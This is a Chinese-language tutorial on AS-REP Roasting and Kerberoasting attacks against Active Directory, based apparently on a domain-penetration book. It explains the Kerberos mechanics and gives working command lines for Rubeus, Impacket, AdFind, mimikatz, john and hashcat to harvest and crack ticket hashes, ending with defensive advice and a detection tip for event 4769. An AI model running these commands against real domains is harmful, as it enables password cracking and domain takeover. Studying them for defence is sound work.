域内攻击手法——AS-REP Roasting攻击和Kerberoasting攻击

一、AS-REP Roasting攻击

1、AS-REP Roasting攻击原理

AS-REP Roasting是一种对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限，因为其需要用户账户设置不要求Kerberos 预身份验证选项，而该选项默认是没有勾选的。Kerberos 预身份验证发生在 Kerberos 身份验证的第一阶段（AS_REQ&AS REP），它的主要作用是防止密码离线爆破。默认情况下，预身份验证是开启的，KDC 会记录密码错误次数，防止在线爆破。
当关闭了预身份验证后，攻击者可以使用指定用户向域控制器的 Kerberos 88 端口请求票据，此时域控不会进行任何验证就将 TGT 和该用户 Hash 加密的 Login Session Key 返回。因此，攻击者就可以对获取到的用户 Hash 加密的 Login Session Key 进行离线破解，如果字典够强大，则可能破解得到该指定用户的明文密码。

2、AS-REP Roasting攻击前提

• 域用户勾选“不要求Kerberos预身份验证”

• 需要一台可与KDC 88端口进行通信的主机

3、AS-REP Roasting攻击抓包分析

我们对域内用户 Mary 勾选“不要求 Kerberos 预身份验证”选项和不勾选“不要求 Kerberos 预身份验证”选项两种情况下，使用工具向 AS 发起 AS-REQ，在这个过程中使用 WireShark 抓包分析

• 勾选“不要求 Kerberos 预身份验证”选项

  第一个包是以用户 Mary 身份发起一个 AS-REQ 请求。由于设置了“不要求 Kerberos 预身份验证”属性，因此是不需要预认证的。可以看到在 AS-REQ 包中可以看到是没有 pA-ENC-TIMESTAMP 字段的。

  

  第二个包是 KDC 的 AS-REP 包，该包中返回了 TGT 以及用户 Mary Hash 加密的 Login Session Key。攻击者就是取得这串加密字符后进行本地离线爆破。

  

• 不勾选“不要求Kerberos预身份验证”选项
  当取消了“不要求Kerberos预身份验证”属性，是需要预认证的。可以看到在AS-REQ包中可以看到pA-ENC-TIMESTAMP 字段。该字段是用用户Hash加密时间戳。

  

4、AS-REP Roasting攻击过程

AS-REP Roasting 攻击过程主要有两步：

• 第一步，获取 AS-REP 响应包中用户 Hash 加密的 Login Session Key
• 第二步，对上一步获得的 Hash 进行解密。对于获取加密的 Login Session Key 的方式又分为域内机器和非域机器两种获取方式

1）获取AS-REP响应包中用户Hash加密的Login Session Key

域内机器的获取方式

• Rubeus
  Rubesu 是由国外安全研究院 harmj0y 用 C# 编写的针对 Kerberos 协议进行攻击的工具,可以发起Kerberos请求，并将请求票据导入内存中，Rebeus 提供了大量的用于 Kerberos 攻击的功能，比如 TGT 请求/ST请求/AS-REP Roasting攻击/Kerberoasting攻击/委派攻击/黄金票据/白银票据等。
  如果当前主机在域内，可以通过执行如下命令运行 Rubeus，该工具会自动搜索域内勾选了“不要求 Kerberos 预身份验证”选项的用户，并以该用户身份发起 AS-REQ，由于不需要预身份验证，所以 KDC会直接返回 AS-REP包。然后该工具会将 AS-REP 包中返回的用户 Hash 加密的 Login Session Key 以 John 工具能破解的格式保存在指定文件中。

  Rubeus.exe asreproast /format:john /outfile:hash.txt
  

  运行 Rubeus 工具获取域内设置了“不要求Kerberos预身份验证”的用户，搜到了用户 mary，然后以用户 mary 身份发送 AS-REQ 包，并将 KD C返回的用户 Has h加密的 Login Session Key 保存为 hash.txt 文件。

  

• ASREPRoast.ps1脚本
  如果当前主机在域内，则可通过执行如下命令导入 ASREPRoast.ps1 脚本并进行操作。该脚本会自动搜索域内设置了不要求 Kerberos 预身份验证的域用户，并以该用户身份发送 AS-REQ，由于不需要预身份验证，所以域控会直接返回 AS-REP 包。然后该工具会输出不要求 Kerberos 预身份验证的用户名、DN 以及用户 Hash 加密的 Login Session Key。最后使用 select 语句过滤出 Hash。

  Import-Module .\ASREPRoast.ps1
  Invoke-ASREPRoast | select -ExpandProperty Hash
  

  

非域机器的获取方式

• 对于非域内的机器，就无法通过上面两种方式来获取 Hash 了。要想获取域内勾选了“不需要 Kerberos 预身份验证”选项的账户、可以使用 Adfind 执行如下命令来进行过滤查询，前提是拥有一个有效的域账户和密码。查询出符合条件的域账户之后，再使用 Impacket 下的 GetNPUsers.py 脚本获取针对指定用户的用户 Hash 加密的 Login Session Key。

  AdFind.exe -h <域控IP>:389 -u <域用户> -up <密码> -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn
  

  如图使用 Adfind 过滤域内勾选了“不需要 Kerberos 预身份验证”的账号，过滤出了用户 Mary。
  然后使用 Impacket 下的 GetNPUsers.py 脚本把上一步过滤出来的域账户写入 user.txt 文件中。运行如下命令获取针对指定用户的用户 Hash 加密的 Login Session Key，该格式可以被 John 直接爆破。

  python GetNPusers.py -dc-ip <域控IP> -usersfile user.txt -format john <域名>/
  

  

2）对上一步获得的Hash进行解密

• john
  使用 john 对上一步获取到的 Hash 进行爆破，命令如下，但是爆破成功与否与字典强度有关。

  john --wordlist=<密码字典路径> <hash值>
  

  

• hashcat
  而如果想用 hashcat 进行爆破，由于第一步获取的 Hash 格式并不能直接被 hasheat 所爆破，因此要手动添加 $23 到如图所示位置。
  然后使用如下命令进行爆破，爆破出明文密码为admin!@#45

  hashcat –m 18200 <hash值> <密码字典路径> -–force
  

  

  hashcat命令格式：https://hashcat.net/wiki/doku.php?id=example_hashes

二、Kerberoasting攻击

1、Kerberoasting攻击原理

Kerberoasting 是域渗透中经常使用的一项技术，是 Tim Medin 在 DerbyCon 2014 上发布的一种域口令攻击方法，Tim Medin 同时发布了配套的攻击工具 kerberoast。此后，不少研究人员对 Kerberoasting 进行了改进和扩展，在 GitHub 上开发发布了大量工具，使得 Kerberoasting 逐渐发展成为域攻击的常用方法之一。
Kerberoasting 攻击是在 TGS_REP 的过程中用户将会收到由目标服务实例的 NTLM hash 加密生成的 ST(service ticket)，如果获得这个 ST 票据，由于该 ST 是用服务 Hash 进行加密的，因此客户端在拿到该 ST 后可以用于本地离线爆破。如果攻击者的密码字典足够强大，则很有可能爆破出 SPN 链接用户的明文密码。如果该服务在域内被配置为高权限运行，那么攻击者可能接管整个域。
整个过程的核心点在于，攻击者和 KDC 协商ST加密的时候，协商的是使用 RC4_HMAC_MDS 加密算法。而该加密算法较容易被破解，因此攻击者能在本地进行离线爆破。

2、服务主体名称SPN

1）简介

SPN（ServicePrincipal Names，服务主体名称）是服务实例的唯一标识符，当域内存在大量的服务时，域控为了方便管理会对服务进行标识，那么域控标识所使用的方法就是SPN。Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。如果在整个林或域中的计算机上安装多个服务实例，则每个实例都必须具有自己的 SPN。

2）SPN类型分类

SPN可以分为以下两种类型：

• 注册在活动目录的“机器账户computer”下
  
• 注册在活动目录的“域账号Users”下
  

注册在活动目录的机器账户（CN=Computer）下。当某一个服务的权限为 Local System 或者 Network Service 时，SPN 会注册在机器账户下，同时所加入域的每台机器都会自动注册两个SPN：“Host/主机名”和“Host/主机名.DC名”。
注册在活动目录的域账号（CN=Users）下。当某一个服务的权限为一个域用户时，SPN会注册在活动目录的域账号下。（默认只有机器用户或者域管理员用户才有权限去注册SPN(将服务注册在域用户的权限)）

3）SPN的格式定义

如下为 SPN 格式定义，其中<serviceclass> 服务类和<host>主机名为必要参数，<port>、<server name>为可选参数。

# SPN的格式
<serviceclass>/<host>:<port>/<service name>

• <service class>：服务的名称，例如：LDAP、MSsql、SMTP等。
• <host>：服务所在主机名，host有两种形式，可以是FQDN(webadmin.god.org)和NetBIOS(webadmin)这两种形式任意一种。
• <port>：服务的端口号，如果使用的是默认端口可以省略。
• <server name>：服务的专有名称，可以省略

4）SPN服务注册

Kerberos 协议关于 Client 请求 Server 的某种服务，假设我们需要请求某个 Server 的 Http 服务并且我们还想经过 Kerberos 协议的认证，那么就需要给 Server 注册一个 SPN，给 Server 注册 SPN 之后 Kerberos 就会将服务器实例和服务登录账号关联，在 SPN 服务注册方面我们使用本地 Windows 自带的一个二进制的文件— Set SPN 进行注册。

setspn -U -S MySQL/webadmin.god.org:3306/ webadmin      // 在主机webadmin上为webadmin用户注册SPN服务
setspn -L webadmin                                  	// 列出在webadmin帐户中注册的SPN
setspn -q */*                                   		// 查询当前域内所有的SPN

常见的SPN实例名称：

常见服务	SPN服务实例名称
SQL Server	MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433
Hyper-V Host	Microsoft Virtual Console Service/adsmsHV01.adsecurity.org
Exchange	ExchangeMDB/adsmsEXCAS01.adsecurity.org
VMWareVCenter	STS/adsmsVC01.adsecurity.org
RDP	TERMSERV/adsmsEXCAS01.adsecurity.org
WSMan	WSMAN/adsmsEXCAS01.adsecurity.org

以普通域用户注册 SPN 服务主体时，需要域管理员的权限

3、Kerberoasting攻击抓包分析

我们通过使用 Impacket 执行请求注册于用户 Mary 下的 SPN 的服务票据。在此过程中使用 Wireshark 进行抓包分析。

python GetUserSPNs.py -request -dc-ip 192.168.3.21 god.org/mary:admin!@#45 -outputfile hash.txt -request-user webadmin

第1个 AS-REQ 包是用户 Mary 向 KDC 的 AS 请求TGT。

第2个 AS-REP 包是KDC返回的TGT，正常情况下，TGT的加密方式为AES256。
第3个 TGS-REQ 包用上一步得到的 TGT 向 KDC 的 TGS 服务请求针对用户webadmin 链接的SPN的服务票据。可以看到，请求协商的加密类型有HMAC-MDS，DES 和DES3。

第4个 TGS-REP 包是 KDC 的 TGS 服务返回的由指定 SPN 链接的用户的密码 Hash 加密的服务票据。可以看到，加密类型为 HMAC_MDS，而正常 TGS-REP 包的 ST 的默认加密类型为 AES256。

4、Kerberoasting攻击攻击过程

1）攻击过程

• 攻击者提供一个正常的域用户密码对域进行身份认证，KDC 在验证账户和密码的有效性后，会返回一个 TGT。该 TGT 用于以后的 ST 请求。
• 攻击者使用获得的 TGT 请求针对指定 SPN 的 ST 。在请求服务票据的 TGS-REQ 过程中，攻击者可以指定其支持的 Kerberos 加密类型为 RC4_HMAC_MD5（ARCFOUR-HMAC-MDS），因为 RC4_HMAC_MD5 加密算法相比于其他加密算法更容易被破解。
• 如果攻击者的 TGT 是有效的，不管提供的域账户有无访问该指定 SPN 服务的权限，KDC 都会查找哪个账户在 ServicedPrincipalName 属性中注册了所请求的 SPN，然后用该用户的 Hash 以 RC4_HMAC_MDS 加密类型加密 ST 并在 TGS-REP 包中发送给攻击者（这一步不管用户有没有访问服务的权限，只要 TGT 正确，就都会返回 ST 服务票据，这也是 Kerberoasting 能利用的原因。也就是说，任何一个用户，只要 hash 正确，就可以请求域内任何一个服务的 ST 票据）
• 攻击者从 TGS-REP 包中提取加密的 ST。由于该 ST 是用链接到请求的 SPN 的账户 Hash 加密的，因此攻击者可以本地离线破解。如果攻击者的字典足够强大，则可以爆破出该 SPN 所链接账户的明文密码。

注意：Kerberoasting 攻击一般只针对注册在用户下的 SPN，因为机器账户的密码是随机生成的128位字符，是不可能爆破出来的。

2）实战思路

• 查询域内注册于域用户下的 SPN
• 请求指定 SPN 的 ST
• 导出请求的 ST
• 对该导出的 ST 进行离线爆破

5、SPN的发现

• setspn命令
  如果当前主机在域内，并且使用域用户进行登录，如果没有登录就提权到 system 用户，可以使用过以下命令进行查询。

  setspn -q */*             	   // 查询当前域内所有的SPN
  setspn -T examples.com -q */*  // 查看指定域内所有的SPN，如果指定域不存在，默认切换查找本域的SPN或本域重复的SPN
  

• RiskySPN
  RiskySPN 是一个 PowerShell 脚本的集合，专注于检测与 SPN 相关的账户是否滥用，该脚本可以帮助我们自动识别弱密码服务票据，根据用户账户和密码过期时间来查找最容易包含弱密码的票据。执行如下命令，该脚本会自动查找并过滤出（自动去除注册于krbtgt下的kadmin/changepw）当前域内注册于域用户下的可能包含弱密码的 SPN 的详细信息。

  Import-Module .\Find-PotentiallyCrackableAccounts.ps1
  Find-PotentiallyCrackableAccounts -FullDate
  

  项目地址：https://github.com/cyberark/RiskySPN

• GetUserSPNs
  GetUserSPNs 是 Kerberoast 工具集中查询注册于域内用户下的 SPN 的脚本，该脚本会查询域内所有注册于用户下的 SPN，包括注册于 krbtgt 下的 kadmin/changepw。

  Import-Module .\GetUserSPNs.ps1
  

  
  服务主体名称（SPN）也可以从未加入域的系统中发现，impacket 工具包下的 python 版 GetUserSPNs 可以为我们做到这点，但是，无法使用基于 token 的身份验证，因此与 Active Directory 进行通信需要获取有效的域凭证

  

• PowerView.ps1
  PowerView.ps1 是 PowerSpolit 中 Recon 目录下的一个 PowerShell 脚本，该脚本可用于查询过滤出域用户下注册了 SPN 的用户，包括 krbtgt 用户，并返回用户的详细信息。

  Import-Module .\PowerView.ps1
  Get-NetUser –SPN
  

  

6、请求SPN服务票据

当过滤出注册于用户下的 SPN 之后，我们就需要请求这些 SPN 的服务票据了。

• impacket - GetUserSPNs
  Impacket 中的 GetUserSPNs.py 脚本可以请求注册于用户下的所有 SPN 的服务票据，也可以请求注册于指定用户下的 SPN 的服务票据。该脚本使用命令如下：

  # 请求注册于用户下的所有SPN的服务票据，并以 hashcat 能破解的格式保存为指定文件
  python GetUserSPNs.py -request -dc-ip <域控IP> <域名>/<域用户账号>:<密码> -outputfile <文件名>
  # 请求注册于指定用户下的SPN的服务票据
  python GetUserSPNs.py -request -dc-ip <域控IP> <域名>/<域用户账号>:<密码> -outputfile <文件名> -request-user <指定域用户>
  

  

• Rubeus
  Rubeus 中的 Kerberoast 支持对所有用户或特定用户执行 Kerberoasting 操作，它的原理在于先用 LDAP 查询域内所有注册在域用户下的 SPN（除了kadmin/changepw），再通过发送 TGS 包，直接输出能使用 John 或 hashcat 爆破的 Hash。该工具使用命令如下：

  # 请求注册于用户下的所有SPN的服务票据，并以hashcat能破解的格式保存到指定文件
  Rubeus.exe kerberoast /format:john /outfile:<文件名>
  # 请求注册于用户下的指定SPN的服务票据，并以hashcat能破解的格式保存到指定文件
  Rubeus.exe kerberoast /spn:<serviceclass>/<host>:<port>/<service name> /format:john outfile:<文件名>
  

  

• mimikatz
  使用 mimikatz 请求指定 SPN 的服务票据，请求的服务票据将保存在内存中，然后从内存中导出票据

  # 申请指定的SPN服务票据
  kerberos::ask /target:<serviceclass>/<host>:<port>/<service name>
  kerberos::ask /target:MsSQL/dbadmin.god.org
  # 查看票据
  kerberos::list
  # 导出所有票据
  kerberos::list /export 
  

  
  

7、离线破解用户服务票据HASH

通过前面几步取得了 .kirbi 票据文件或 hashcat、John 能直接破解的文件，接下来就需要本地离线破解服务票据了。

• tgsrepcrack脚本
  kerberoast 是用于攻击 Kerberos 实现的一些工具的集合。该工具中的 tgsrepcrack.py 脚本可以对 mimikatz 导出的 kirbi 格式的票据进行爆破。

  python2 tgsrepcrack.py <密码字典> <票据>
  

• hashcat
  针对 Impacket 和 Rebeus 请求的票据格式，可以使用 hasheat 执行如下命令来进行爆破。

  hashcat –m 13100 <hash值> <密码字典路径> -–force
  

  

8、Kerberoasting 攻击防御

• 确保服务账户和密码为强密码，具有随机性并定期修改。
• Kerberoasting能成功的最大因素就是KDC返回的ST是用RC4_HMAC_MD5加密算法加密的，攻击者可以比较简单地进行爆破。如果配置强制使用AES256-HMAC方式对Kerberos 票据进行加密，那么即使攻击者获取了 ST，也无法将其破解。但这种加密方式存在兼容性问题。
• 许多服务账户在域中被分配了过高的权限，从而导致攻击者在破解出该服务账户的密码后，能迅速进行域内权限提升。因此，应该对域内的服务账户权限进行限制，采取最小化权限原则。
• 防守方在检测Kerberoasting攻击时，可以进行日志审计，重点关注事件ID为4769（请求Kerberos服务票据操作）的日志。如果有过多的4769 日志，可以对事件ID为4769的日志进行筛选，筛选出票据加密类型为0x17（RC4-HMAC）的日志，如图所示。
  
  参考书籍：
  《域渗透攻防指南》(谢兆国 张秋圆)